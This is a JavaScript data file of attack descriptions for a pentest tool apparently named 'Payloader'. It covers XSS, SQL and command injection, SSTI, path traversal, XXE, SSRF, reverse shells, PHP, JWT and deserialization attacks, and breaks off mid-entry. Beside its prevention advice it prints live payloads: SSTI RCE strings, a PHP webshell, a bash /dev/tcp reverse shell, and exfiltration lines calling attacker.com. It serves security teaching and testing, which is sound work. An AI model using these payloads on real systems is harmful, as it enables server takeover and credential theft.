/* Payloader — Module Info
   In-depth attack descriptions for all 22 modules.
   Sources: PortSwigger Web Security Academy, HackTricks, OWASP. */

const MODULE_INFO = {

  xss: {
    name: 'Cross-Site Scripting (XSS)',
    icon: '⚡',
    owasp: 'A03:2021',
    cvss: 'Medium–High (6.1–8.8)',
    summary: 'XSS allows attackers to inject client-side scripts into web pages viewed by other users, bypassing the same-origin policy and executing in the victim\'s browser context.',
    what: 'XSS occurs when an application includes untrusted data in a web page without proper validation or escaping. An attacker can use XSS to steal session cookies, redirect users, deface sites, or install keyloggers.',
    types: [
      { name: 'Reflected XSS', desc: 'Payload is reflected immediately in the HTTP response. Requires tricking victim into clicking a crafted URL.' },
      { name: 'Stored XSS', desc: 'Payload is persisted in the database and served to every user who visits the page — most dangerous variant.' },
      { name: 'DOM-based XSS', desc: 'Vulnerability exists in client-side JS. Payload never reaches the server; the browser itself processes it.' },
    ],
    testing: [
      'Identify all input reflection points: URL params, form fields, HTTP headers, JSON responses',
      'Test with benign probes: <h1>test</h1>, "><h1>test, javascript:void(0)',
      'Check developer tools: does your input appear in DOM, attributes, or JS context?',
      'Try context-specific payloads: attribute breakout, script injection, event handler injection',
      'Check CSP header — Content-Security-Policy may block inline scripts',
      'Test DOM sinks: document.write, innerHTML, eval, location.href, document.domain',
    ],
    prevention: [
      'Context-aware output encoding (HTML, JS, URL, CSS context)',
      'Content Security Policy (CSP) with nonce or hash-based allow-lists',
      'Use safe DOM APIs: textContent, setAttribute — avoid innerHTML with user data',
      'HttpOnly cookie flag prevents JS cookie theft',
      'Validate and sanitize input server-side (DOMPurify for HTML)',
    ],
    refs: [
      { label: 'PortSwigger: XSS', url: 'https://portswigger.net/web-security/cross-site-scripting' },
      { label: 'PortSwigger: XSS Cheat Sheet', url: 'https://portswigger.net/web-security/cross-site-scripting/cheat-sheet' },
      { label: 'HackTricks: XSS', url: 'https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting' },
      { label: 'OWASP: XSS Prevention', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html' },
      { label: 'MDN: Content Security Policy', url: 'https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP' },
    ],
  },

  sqli: {
    name: 'SQL Injection',
    icon: '🗄️',
    owasp: 'A03:2021',
    cvss: 'Critical (9.8)',
    summary: 'SQL Injection allows attackers to interfere with database queries, potentially bypassing authentication, extracting data, modifying records, or executing OS commands via the DB engine.',
    what: 'SQLi occurs when user-supplied data is incorporated into SQL queries without proper parameterization. A single-quote test \' can break query structure and reveal vulnerability. Impacts include full database dump, auth bypass, file read/write, and in some DBs (SQL Server, PostgreSQL) OS command execution via xp_cmdshell / COPY TO.',
    types: [
      { name: 'In-band (Error)', desc: 'Error messages reveal database info — extracttype:extractvalue(), updatexml().' },
      { name: 'In-band (UNION)', desc: 'UNION SELECT appends attacker query results to legitimate results.' },
      { name: 'Blind (Boolean)', desc: 'No visible output — infer data from True/False responses. AND 1=1 vs AND 1=2.' },
      { name: 'Blind (Time)', desc: 'No output — infer via response delay. SLEEP(5), WAITFOR DELAY.' },
      { name: 'Out-of-band (OOB)', desc: 'Exfiltrate data via DNS/HTTP requests. LOAD_FILE, UTL_HTTP, xp_dirtree.' },
      { name: 'Stacked Queries', desc: 'Execute multiple statements separated by semicolons (MSSQL, PostgreSQL).' },
    ],
    testing: [
      'Inject a single quote \' — look for SQL error, changed behavior, or 500 response',
      'Test boolean logic: AND 1=1 (true) vs AND 1=2 (false) — compare responses',
      'Time-based: id=1; SLEEP(5)-- — measure response time',
      'Enumerate columns: ORDER BY 1-- through ORDER BY N-- until error',
      'UNION SELECT NULL,NULL,NULL-- — match column count, then extract data',
      'Use sqlmap: sqlmap -u "https://target.com/item?id=1" --dbs',
      'Check all input points: GET/POST params, cookies, HTTP headers (X-Forwarded-For, User-Agent)',
    ],
    prevention: [
      'Use parameterized queries / prepared statements — primary defense',
      'ORM frameworks with proper parameterization (Hibernate, SQLAlchemy)',
      'Stored procedures with parameterized inputs',
      'Principle of least privilege on DB accounts',
      'WAF as secondary defense (not primary)',
      'Input validation: reject unexpected characters where possible',
    ],
    refs: [
      { label: 'PortSwigger: SQL Injection', url: 'https://portswigger.net/web-security/sql-injection' },
      { label: 'PortSwigger: SQL Injection Cheat Sheet', url: 'https://portswigger.net/web-security/sql-injection/cheat-sheet' },
      { label: 'HackTricks: SQLi', url: 'https://book.hacktricks.xyz/pentesting-web/sql-injection' },
      { label: 'OWASP: SQL Injection', url: 'https://owasp.org/www-community/attacks/SQL_Injection' },
      { label: 'OWASP: Query Parameterization Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html' },
    ],
  },

  cmdi: {
    name: 'Command Injection',
    icon: '💻',
    owasp: 'A03:2021',
    cvss: 'Critical (9.8)',
    summary: 'Command injection allows attackers to execute arbitrary OS commands on the server by injecting shell metacharacters into application inputs that are passed to system shells.',
    what: 'Applications that pass user input to OS-level functions (system(), exec(), popen()) without sanitization are vulnerable. A successful attack can result in full server compromise, file system access, reverse shells, and lateral movement. Common in features like ping tools, DNS lookups, file converters, and legacy utilities.',
    types: [
      { name: 'Inline Injection', desc: 'Inject additional commands after original: ping 127.0.0.1; id' },
      { name: 'Blind Injection', desc: 'No output visible — use time delays (sleep 5) or OOB (curl attacker.com)' },
      { name: 'OOB Injection', desc: 'Exfiltrate via DNS: nslookup $(whoami).attacker.com' },
    ],
    testing: [
      'Test shell metacharacters: ; | || && & $(cmd) `cmd` > < \\ \\n',
      'Blind: inject ; sleep 5 — observe response delay',
      'OOB: inject ; nslookup $(id).BURP-COLLABORATOR-DOMAIN',
      'Windows targets: & ping -n 10 127.0.0.1 & (time delay)',
      'Try URL encoding: %3B%20id, %7C%20id for WAF bypass',
      'Check all system-level feature inputs: ping, whois, resolve, convert, compress',
    ],
    prevention: [
      'Avoid passing user input to OS commands — redesign the feature',
      'If unavoidable: use allowlists of safe values (e.g. only alphanumeric)',
      'Use language-safe APIs instead of shell (e.g. Java ProcessBuilder with args array)',
      'Escape shell metacharacters (escapeshellarg, shlex.quote)',
      'Run application with minimal OS privileges',
      'Containerization/sandboxing to limit blast radius',
    ],
    refs: [
      { label: 'PortSwigger: OS Command Injection', url: 'https://portswigger.net/web-security/os-command-injection' },
      { label: 'HackTricks: Command Injection', url: 'https://book.hacktricks.xyz/pentesting-web/command-injection' },
      { label: 'OWASP: Command Injection', url: 'https://owasp.org/www-community/attacks/Command_Injection' },
      { label: 'PayloadsAllTheThings: CMDi', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection' },
    ],
  },

  ssti: {
    name: 'Server-Side Template Injection',
    icon: '🧱',
    owasp: 'A03:2021',
    cvss: 'Critical (9.8)',
    summary: 'SSTI occurs when user input is embedded directly into server-side template engines, allowing attackers to execute arbitrary template directives — potentially leading to RCE.',
    what: 'Template engines (Jinja2, Twig, Freemarker, Velocity, ERB) are designed to generate dynamic content. If user input is concatenated into a template string rather than passed as a variable, attackers can inject template syntax. In many engines this can escalate from data exposure to full server-side code execution.',
    types: [
      { name: 'Jinja2/Flask', desc: '{{7*7}} → 49. RCE: {{config.__class__.__init__.__globals__[\'os\'].popen(\'id\').read()}}' },
      { name: 'Twig/PHP', desc: '{{7*7}} → 49. RCE: {{[\'id\']|filter(\'system\')}}' },
      { name: 'Freemarker', desc: '${7*7} → 49. RCE: <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}' },
      { name: 'ERB/Ruby', desc: '<%= 7*7 %> → 49. RCE: <%= system(\'id\') %>' },
      { name: 'Smarty', desc: '{$smarty.version} → version leak. RCE via {php}system(\'id\');{/php}' },
    ],
    testing: [
      'Inject mathematical expression: {{7*7}}, ${7*7}, <%= 7*7 %>, #{7*7}, *{7*7}',
      'Identify engine from error messages or output format',
      'Use decision tree: {{7*\'7\'}} → "7777777" (Jinja2) vs "49" (Twig) vs "49" (others)',
      'Escalate to object access: {{"".__class__.__mro__}}, {{config}}',
      'Use tplmap for automated detection and exploitation',
      'Test in email templates, PDF generators, error pages, user profile fields',
    ],
    prevention: [
      'Never concatenate user input into template strings — pass as context variables',
      'Use sandboxed template engine modes (Jinja2 SandboxedEnvironment)',
      'Disable dangerous template features (exec, popen) in engine config',
      'Allowlist template syntax if users must supply templates',
      'WAF rules for template expression patterns',
    ],
    refs: [
      { label: 'PortSwigger: SSTI', url: 'https://portswigger.net/web-security/server-side-template-injection' },
      { label: 'HackTricks: SSTI', url: 'https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection' },
      { label: 'PayloadsAllTheThings: SSTI', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection' },
      { label: 'tplmap Tool', url: 'https://github.com/epinna/tplmap' },
    ],
  },

  traversal: {
    name: 'Path Traversal',
    icon: '📁',
    owasp: 'A01:2021',
    cvss: 'High (7.5)',
    summary: 'Path traversal (directory traversal) allows attackers to read arbitrary files on the server by manipulating file path inputs with ../ sequences, potentially exposing config files, credentials, and source code.',
    what: 'When applications use user-supplied data in file system operations without properly sanitizing path separators and traversal sequences, attackers can escape the intended directory. Reading /etc/passwd, web server configs, application secrets, or private keys is common. Some cases allow file write → RCE.',
    types: [
      { name: 'Basic', desc: '../../../../etc/passwd — simple traversal to root' },
      { name: 'Encoded', desc: '%2e%2e%2f%2e%2e%2fetc%2fpasswd — URL encoded to bypass filters' },
      { name: 'Double Encoded', desc: '%252e%252e%252f — double encoded, bypasses single-decode WAFs' },
      { name: 'Null Byte', desc: '../../../../etc/passwd%00.jpg — terminates string in C-based apps' },
      { name: 'Windows', desc: '..\\..\\..\\Windows\\win.ini, ..%5c..%5c — Windows path separator' },
      { name: 'Absolute Path', desc: '/etc/passwd — if app prepends controlled base, absolute path bypasses traversal check' },
    ],
    testing: [
      'Identify file-serving parameters: file=, path=, page=, include=, doc=, lang=',
      'Try: ../../../../etc/passwd for Linux, ../../../../Windows/win.ini for Windows',
      'Apply URL encoding, double encoding, and Unicode encoding if basic fails',
      'Test with Burp Intruder + SecLists path traversal wordlist',
      'Check for null byte (%00) truncation in older PHP apps',
      'Look at image/download endpoints — these often read from filesystem directly',
    ],
    prevention: [
      'Resolve canonical path and verify it starts with expected base directory',
      'Use allowlist of permitted files/directories',
      'Avoid passing user-controlled data to filesystem APIs',
      'Use indirect object references (integer IDs mapped to file names server-side)',
      'Chroot jail or containerization to limit accessible filesystem',
    ],
    refs: [
      { label: 'PortSwigger: Path Traversal', url: 'https://portswigger.net/web-security/file-path-traversal' },
      { label: 'HackTricks: Path Traversal', url: 'https://book.hacktricks.xyz/pentesting-web/file-inclusion' },
      { label: 'OWASP: Path Traversal', url: 'https://owasp.org/www-community/attacks/Path_Traversal' },
      { label: 'PayloadsAllTheThings: Path Traversal', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Path%20Traversal' },
    ],
  },

  xxe: {
    name: 'XXE Injection',
    icon: '📄',
    owasp: 'A05:2021',
    cvss: 'High (8.2)',
    summary: 'XXE (XML External Entity) injection exploits XML parsers that process external entity declarations, enabling file disclosure, SSRF, port scanning, and in some cases RCE.',
    what: 'When an application parses XML input and the parser has external entity processing enabled, attackers can define entities that reference local files (file:///etc/passwd) or remote URLs (SSRF). Blind XXE uses OOB exfiltration via DNS/HTTP. SVG, DOCX, XLSX, and API endpoints accepting XML are common attack surfaces.',
    types: [
      { name: 'File Disclosure', desc: 'Read local files via file:// protocol entity' },
      { name: 'SSRF via XXE', desc: 'External entity pointing to internal service URL' },
      { name: 'Blind OOB', desc: 'Exfiltrate file content via DNS/HTTP to attacker server' },
      { name: 'Parameter Entities', desc: '% entities for advanced payload chaining and blind exfil' },
      { name: 'SVG/File Upload', desc: 'Upload SVG/DOCX with XXE — server parses during processing' },
      { name: 'XInclude', desc: 'xi:include attack when full XML doc control not possible' },
    ],
    testing: [
      'Identify XML input points: SOAP, REST with XML body, file uploads (SVG, DOCX)',
      'Replace existing entity or add DOCTYPE before root element',
      'Test: <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> then &xxe;',
      'For blind: use Burp Collaborator for OOB DNS/HTTP detection',
      'Try XInclude if you can\'t control DOCTYPE: <xi:include parse="text" href="file:///etc/passwd"/>',
      'Test SVG upload with XXE entity in SVG XML',
    ],
    prevention: [
      'Disable external entity processing in XML parser (PRIMARY defense)',
      'Use simpler data formats (JSON) instead of XML where possible',
      'Patch and update XML parsing libraries',
      'Server-side input validation and allowlisting',
      'Disable DTD processing entirely if not required',
    ],
    refs: [
      { label: 'PortSwigger: XXE', url: 'https://portswigger.net/web-security/xxe' },
      { label: 'HackTricks: XXE', url: 'https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity' },
      { label: 'OWASP: XXE Prevention', url: 'https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html' },
      { label: 'PayloadsAllTheThings: XXE', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection' },
    ],
  },

  ssrf: {
    name: 'Server-Side Request Forgery',
    icon: '🌐',
    owasp: 'A10:2021',
    cvss: 'High (8.6)',
    summary: 'SSRF tricks the server into making HTTP requests to attacker-controlled destinations, enabling access to internal services, cloud metadata APIs, and potentially full internal network access.',
    what: 'Applications that fetch remote URLs (webhooks, URL previews, PDF generators, importers) can be abused to reach internal infrastructure. Cloud environments are especially vulnerable — metadata APIs at 169.254.169.254 (AWS) and metadata.google.internal expose IAM credentials, allowing full cloud account takeover. Blind SSRF uses OOB channels.',
    types: [
      { name: 'Basic', desc: 'http://localhost/admin — access internal admin on same host' },
      { name: 'Cloud Metadata', desc: 'http://169.254.169.254/latest/meta-data/iam/security-credentials/' },
      { name: 'Internal Network', desc: 'http://192.168.1.1/ — scan internal network via server' },
      { name: 'Blind SSRF', desc: 'No response reflected — detect via Burp Collaborator DNS/HTTP hits' },
      { name: 'Protocol Switching', desc: 'file://, dict://, gopher:// to reach non-HTTP services' },
    ],
    testing: [
      'Identify URL input parameters: url=, webhook=, callback=, fetch=, dest=, redirect=',
      'Try: http://localhost/, http://127.0.0.1/, http://[::1]/',
      'Cloud: http://169.254.169.254/latest/meta-data/ (AWS), http://metadata.google.internal/',
      'Bypass filters: http://2130706433/ (decimal IP), http://0177.0.0.01/ (octal), http://0x7f000001/',
      'Use Burp Collaborator for blind SSRF detection',
      'Try DNS rebinding: first resolves to safe IP, then to 127.0.0.1',
      'Gopher for Redis/Memcached: gopher://127.0.0.1:6379/_FLUSHALL',
    ],
    prevention: [
      'Allowlist of permitted destinations/domains (primary defense)',
      'Deny internal IP ranges (RFC1918, loopback, link-local) at network level',
      'Block redirects to internal destinations',
      'Use cloud IMDS v2 (requires PUT before GET for metadata)',
      'Network segmentation — application servers shouldn\'t reach internal services directly',
    ],
    refs: [
      { label: 'PortSwigger: SSRF', url: 'https://portswigger.net/web-security/ssrf' },
      { label: 'HackTricks: SSRF', url: 'https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery' },
      { label: 'OWASP: SSRF Prevention', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html' },
      { label: 'PayloadsAllTheThings: SSRF', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery' },
    ],
  },

  redirect: {
    name: 'Open Redirect',
    icon: '↩️',
    owasp: 'A01:2021',
    cvss: 'Medium (6.1)',
    summary: 'Open redirect vulnerabilities allow attackers to redirect users from a trusted domain to a malicious site, enabling phishing, OAuth token theft, and SSRF chaining.',
    what: 'When applications use user-controlled data in redirect URLs without proper validation, attackers can craft URLs that appear to come from a legitimate domain but redirect to malicious sites. Often used in phishing campaigns, OAuth callback abuse, and as a stepping stone for SSRF bypasses.',
    types: [
      { name: 'Basic', desc: '/redirect?url=https://evil.com — direct unvalidated redirect' },
      { name: 'Whitelist Bypass', desc: '//evil.com, /\\evil.com, https://evil.com%40trusted.com' },
      { name: 'CRLF-based', desc: 'Inject CRLF to manipulate Location header' },
      { name: 'Open Redirect → SSRF', desc: 'Chain open redirect on trusted host to bypass SSRF allowlist' },
    ],
    testing: [
      'Find redirect parameters: next=, url=, return=, returnUrl=, goto=, redir=, dest=',
      'Test basic: ?next=https://evil.com',
      'Bypass attempts: //evil.com, ///evil.com, \/evil.com, /\\/evil.com',
      'Protocol-relative: //evil.com — browser treats as same protocol',
      'Chain with SSRF allowlist bypass: target SSRF param → legit domain → redirect to internal',
      'Test OAuth redirect_uri — must match exactly, not prefix',
    ],
    prevention: [
      'Avoid open redirect functionality entirely — use indirect mappings',
      'Allowlist of permitted redirect destinations',
      'Validate redirect URL against allowlist after full URL parsing (not string match)',
      'Warn users they\'re leaving the site before redirecting to external URLs',
    ],
    refs: [
      { label: 'PortSwigger: Open Redirect', url: 'https://portswigger.net/kb/issues/00500100_open-redirection-reflected' },
      { label: 'HackTricks: Open Redirect', url: 'https://book.hacktricks.xyz/pentesting-web/open-redirect' },
      { label: 'OWASP: Unvalidated Redirects', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html' },
      { label: 'PayloadsAllTheThings: Open Redirect', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect' },
    ],
  },

  revshells: {
    name: 'Reverse Shells',
    icon: '🐚',
    owasp: 'A03:2021',
    cvss: 'Critical (10.0)',
    summary: 'Reverse shell payloads establish outbound connections from a compromised server back to an attacker\'s listener, bypassing firewall rules that block inbound connections.',
    what: 'After gaining initial code execution (via RCE, CMDi, webshell, LFI, deserialization), attackers use reverse shells to obtain interactive terminal access. The target initiates the connection outbound (harder to block than inbound), connecting to an attacker-controlled host running a listener (netcat, socat, MSF handler). Used in CTFs, red team engagements, and post-exploitation.',
    types: [
      { name: 'Bash', desc: 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1 — built-in, no dependencies' },
      { name: 'Python', desc: 'python3 -c socket+subprocess — cross-platform, usually installed' },
      { name: 'PHP', desc: 'php -r shell_exec() / proc_open() — web context, CGI' },
      { name: 'PowerShell', desc: 'Windows targets — System.Net.Sockets.TCPClient' },
      { name: 'Netcat', desc: 'nc -e /bin/sh — classic, requires -e flag (not all builds)' },
      { name: 'Socat', desc: 'socat TCP:LHOST:LPORT EXEC:/bin/sh — encrypted, no -e needed' },
    ],
    testing: [
      'Set up listener: nc -lvnp 4444 or socat TCP-LISTEN:4444,reuseaddr STDOUT',
      'Replace LHOST with your IP, LPORT with listener port in all payloads',
      'Upgrade shell: python3 -c "import pty;pty.spawn(\'/bin/bash\')"',
      'Full TTY: Ctrl+Z → stty raw -echo; fg → export TERM=xterm',
      'For authorized testing only — ensure LHOST is your controlled server',
    ],
    prevention: [
      'Egress firewall rules — block outbound connections from application servers',
      'Fix the underlying RCE/CMDi vulnerability that enables shell execution',
      'Application sandboxing and reduced process privileges (no shell access)',
      'Network monitoring for unusual outbound connections',
      'AppArmor/SELinux profiles to restrict process capabilities',
    ],
    refs: [
      { label: 'RevShells.com', url: 'https://www.revshells.com/' },
      { label: 'HackTricks: Reverse Shells', url: 'https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux' },
      { label: 'PayloadsAllTheThings: Reverse Shells', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md' },
      { label: 'PentestMonkey Cheat Sheet', url: 'https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet' },
    ],
  },

  php: {
    name: 'PHP Attacks',
    icon: '🐘',
    owasp: 'A03:2021',
    cvss: 'Critical (9.8)',
    summary: 'PHP-specific vulnerabilities including type juggling, insecure deserialization, LFI wrappers, webshells, and PHP stream abuse enabling RCE and authentication bypass.',
    what: 'PHP\'s loose type system and extensive stream wrapper support create a unique attack surface. Type juggling in loose comparisons (==) can bypass authentication. PHP wrappers (php://filter, php://input, data://) enable LFI-to-RCE chains. Unserialize() on user data allows object injection and gadget chain exploitation.',
    types: [
      { name: 'Type Juggling', desc: '"0e1234" == "0" → true in PHP loose comparison. Bypass MD5 hash checks.' },
      { name: 'Webshells', desc: '<?php system($_GET["cmd"]); ?> — upload for persistent RCE' },
      { name: 'LFI Wrappers', desc: 'php://filter/convert.base64-encode/resource=index.php — read source' },
      { name: 'Unserialize', desc: 'Object injection via unserialize() — exploit __wakeup, __destruct gadgets' },
      { name: 'PHP Include', desc: 'require/include with user input — LFI/RFI via path manipulation' },
    ],
    testing: [
      'Type juggling: try "0e" prefixed MD5 values, true/false/null in comparisons',
      'LFI: file=php://filter/convert.base64-encode/resource=config.php',
      'RFI (if allow_url_include=On): file=http://attacker.com/shell.php',
      'Log poisoning LFI: inject PHP into User-Agent → include /var/log/apache2/access.log',
      'Unserialize: generate gadget chains with phpggc',
      'Test file uploads: upload .php, .php5, .phtml, .phar extensions',
    ],
    prevention: [
      'Use strict comparison (===) instead of loose (==)',
      'Never unserialize user-controlled data — use JSON instead',
      'Disable dangerous PHP functions: disable_functions = system, exec, shell_exec',
      'Set allow_url_include = Off and allow_url_fopen = Off',
      'Validate file upload extensions and MIME types server-side',
      'Keep PHP and dependencies updated',
    ],
    refs: [
      { label: 'HackTricks: PHP Tricks', url: 'https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp' },
      { label: 'PayloadsAllTheThings: PHP', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/PHP%20juggling%20type' },
      { label: 'phpggc: PHP Gadget Chains', url: 'https://github.com/ambionics/phpggc' },
      { label: 'OWASP: PHP Security Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/PHP_Configuration_Cheat_Sheet.html' },
    ],
  },

  jwt: {
    name: 'JWT Attacks',
    icon: '🔑',
    owasp: 'A02:2021',
    cvss: 'High (8.8)',
    summary: 'JWT vulnerabilities include algorithm confusion (RS256→HS256), alg:none, weak secrets, kid injection, and JWK/jku header injection — often leading to authentication bypass and privilege escalation.',
    what: 'JSON Web Tokens are signed tokens used for authentication and authorization. Flaws in JWT validation allow attackers to forge tokens. The alg:none attack skips verification entirely. RS256→HS256 confusion uses the public key as an HMAC secret. Weak secrets can be brute-forced offline. Kid/jku header injection points verification to attacker-controlled keys.',
    types: [
      { name: 'alg:none', desc: 'Set algorithm to "none" — some libraries skip signature verification' },
      { name: 'RS256 → HS256', desc: 'Change alg to HS256, sign with public key as HMAC secret' },
      { name: 'Weak Secret', desc: 'Brute-force HMAC secret offline with hashcat or jwt-cracker' },
      { name: 'kid Injection', desc: 'Inject path traversal or SQL into kid header parameter' },
      { name: 'jku/jwk Header', desc: 'Point jku to attacker-controlled JWK Set URL' },
      { name: 'exp Manipulation', desc: 'Modify expiration to extend token validity (if not properly verified)' },
    ],
    testing: [
      'Decode JWT: base64 decode header and payload (or use jwt.io)',
      'Test alg:none: set "alg":"none", remove signature, check if accepted',
      'Try RS256→HS256: get public key, resign with HS256 using public key as secret',
      'Brute force: hashcat -a 0 -m 16500 token.jwt wordlist.txt',
      'Modify payload claims (role, admin, sub) and check server behavior',
      'Check kid for path traversal: "kid": "../../dev/null"',
      'Use Burp JWT Editor extension for easy manipulation',
    ],
    prevention: [
      'Use established JWT libraries — don\'t implement JWT verification manually',
      'Explicitly specify allowed algorithms in verification (reject "none")',
      'For RS256: use a separate verification key, never allow HS256 fallback',
      'Use strong, random secrets (≥256 bits) for HMAC algorithms',
      'Validate all claims: exp, iss, aud — don\'t trust unverified claims',
      'Pin kid to allowlisted key IDs — never use kid in filesystem lookups',
    ],
    refs: [
      { label: 'PortSwigger: JWT Attacks', url: 'https://portswigger.net/web-security/jwt' },
      { label: 'HackTricks: JWT', url: 'https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens' },
      { label: 'jwt.io Debugger', url: 'https://jwt.io/' },
      { label: 'PayloadsAllTheThings: JWT', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token' },
    ],
  },

  csrf: {
    name: 'CSRF',
    icon: '🔄',
    owasp: 'A01:2021',
    cvss: 'Medium (6.5)',
    summary: 'CSRF tricks authenticated users into submitting forged requests to applications where they\'re logged in, triggering state-changing actions without their knowledge.',
    what: 'Cross-Site Request Forgery exploits the browser\'s automatic inclusion of cookies with requests. If a site relies solely on session cookies for authentication and lacks CSRF tokens, attackers can host a page that makes requests to the target — the victim\'s browser automatically authenticates them. JSON APIs may be vulnerable if CORS allows credentials from any origin.',
    types: [
      { name: 'GET-based', desc: 'img src pointing to state-changing GET endpoint' },
      { name: 'POST Form', desc: 'Auto-submitting form targeting POST endpoint' },
      { name: 'JSON CSRF', desc: 'fetch() with credentials:include to JSON API endpoint' },
      { name: 'Flash/CORS', desc: 'CORS misconfiguration with credentials allows cross-origin reads' },
      { name: 'Login CSRF', desc: 'Force victim to log into attacker\'s account' },
    ],
    testing: [
      'Check for CSRF token in forms and AJAX requests',
      'Test if token is validated server-side (remove it — does request succeed?)',
      'Check if token is tied to session (can you reuse your own token for another user?)',
      'Test SameSite cookie attribute: Strict/Lax blocks most CSRF',
      'Check CORS: Origin header handling — does it reflect back in Access-Control-Allow-Origin?',
      'Test Referer header validation — can it be stripped or spoofed?',
    ],
    prevention: [
      'Synchronizer Token Pattern: unique per-session CSRF token in all state-changing forms',
      'SameSite=Strict or Lax cookie attribute (primary modern defense)',
      'Custom request headers (X-Requested-With) for AJAX — simple CORS blocks these cross-origin',
      'Double Submit Cookie pattern as alternative to server-side token storage',
      'Check Origin/Referer headers as additional validation',
    ],
    refs: [
      { label: 'PortSwigger: CSRF', url: 'https://portswigger.net/web-security/csrf' },
      { label: 'HackTricks: CSRF', url: 'https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery' },
      { label: 'OWASP: CSRF Prevention', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html' },
      { label: 'PayloadsAllTheThings: CSRF', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection' },
    ],
  },

  proto: {
    name: 'Prototype Pollution',
    icon: '☣️',
    owasp: 'A08:2021',
    cvss: 'High (7.5–9.8)',
    summary: 'Prototype pollution allows attackers to inject properties into JavaScript Object.prototype, affecting all objects in the application and potentially achieving XSS or server-side RCE via gadget chains.',
    what: 'In JavaScript, all objects inherit from Object.prototype. If an application merges user-controlled JSON into objects without sanitizing __proto__, constructor, or prototype keys, attackers can pollute the global prototype. Client-side: enables XSS via DOM gadgets. Server-side (Node.js): can override spawn options (env, shell) to achieve RCE via gadget chains in popular libraries.',
    types: [
      { name: 'Client-side', desc: '__proto__[innerHTML] = <img onerror=alert(1)> — DOM XSS via gadgets' },
      { name: 'Server-side (RCE)', desc: '__proto__[shell] = "node" + gadget in child_process.spawn() options' },
      { name: 'JSON injection', desc: '{\"__proto__\":{\"admin\":true}} — elevate privileges via merged objects' },
      { name: 'constructor.prototype', desc: 'Alternative path when __proto__ is blocked' },
    ],
    testing: [
      'Inject via URL params: ?__proto__[foo]=bar — check if Object.prototype.foo is set',
      'Inject via JSON body: {"__proto__":{"admin":true}} in API calls',
      'Test with constructor: {"constructor":{"prototype":{"admin":true}}}',
      'Use Burp DOM Invader for client-side prototype pollution scanning',
      'Server-side: look for merge/clone operations in Node.js (lodash merge, jQuery extend)',
      'Use PP gadget lists: check for child_process.spawn, template engines as sinks',
    ],
    prevention: [
      'Freeze Object.prototype: Object.freeze(Object.prototype)',
      'Use Object.create(null) for lookup objects (no prototype chain)',
      'Validate and sanitize __proto__, constructor, prototype keys in user input',
      'Use allowlists in object merge/assign operations',
      'Keep lodash, jQuery, and other JS libraries updated (many old versions vulnerable)',
    ],
    refs: [
      { label: 'PortSwigger: Prototype Pollution', url: 'https://portswigger.net/web-security/prototype-pollution' },
      { label: 'HackTricks: Prototype Pollution', url: 'https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution' },
      { label: 'PayloadsAllTheThings: Proto Pollution', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Prototype%20Pollution' },
      { label: 'Portswigger Research: PP to RCE', url: 'https://portswigger.net/research/server-side-prototype-pollution' },
    ],
  },

  deserial: {
    name: 'Insecure Deserialization',
    icon: '📦',
    owasp: 'A08:2021',
    cvss: 'Critical (9.8)',
    summary: 'Insecure deserialization occurs when applications deserialize untrusted data, allowing attackers to manipulate serialized objects — leading to RCE, auth bypass, and privilege escalation via gadget chains.',
    what: 'Serialization converts objects to byte streams for storage/transfer; deserialization reconstructs them. If user-controlled serialized data is deserialized, attackers can craft payloads with existing code \'gadgets\' that chain together to execute arbitrary commands during the deserialization process itself — before any validation can occur.',
    types: [
      { name: 'Java (ysoserial)', desc: 'Exploit gadget chains in Apache Commons, Spring, JDK via ysoserial payloads' },
      { name: 'PHP unserialize', desc: 'Object injection exploiting __wakeup/__destruct magic methods' },
      { name: 'Python pickle', desc: 'pickle.loads() executes arbitrary code via __reduce__' },
      { name: 'Node.js node-serialize', desc: 'IIFE in serialized function properties → RCE' },
      { name: 'Ruby Marshal', desc: 'Marshal.load gadget chains in Rails apps' },
      { name: '.NET BinaryFormatter', desc: 'ObjectDataProvider gadgets → RCE in .NET apps' },
    ],
    testing: [
      'Identify serialized data: Java (rO0AB), PHP (O:4:"User"), base64 encoded blobs',
      'Java: use ysoserial: java -jar ysoserial.jar CommonsCollections1 "calc.exe"',
      'PHP: craft object with malicious property → serialize() → inject',
